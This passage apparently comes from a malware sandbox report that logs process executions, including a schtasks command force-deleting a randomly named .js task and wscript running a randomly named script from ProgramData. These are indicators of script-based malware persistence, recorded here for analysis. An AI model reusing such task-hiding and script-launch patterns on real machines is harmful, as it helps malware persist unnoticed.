Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 04:33:00
Start date: 03/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 04:33:03
Start date: 03/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
Imagebase: 0x7ff6e7da0000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 04:33:03
Start date: 03/12/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
Imagebase: 0x7ff63c900000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true
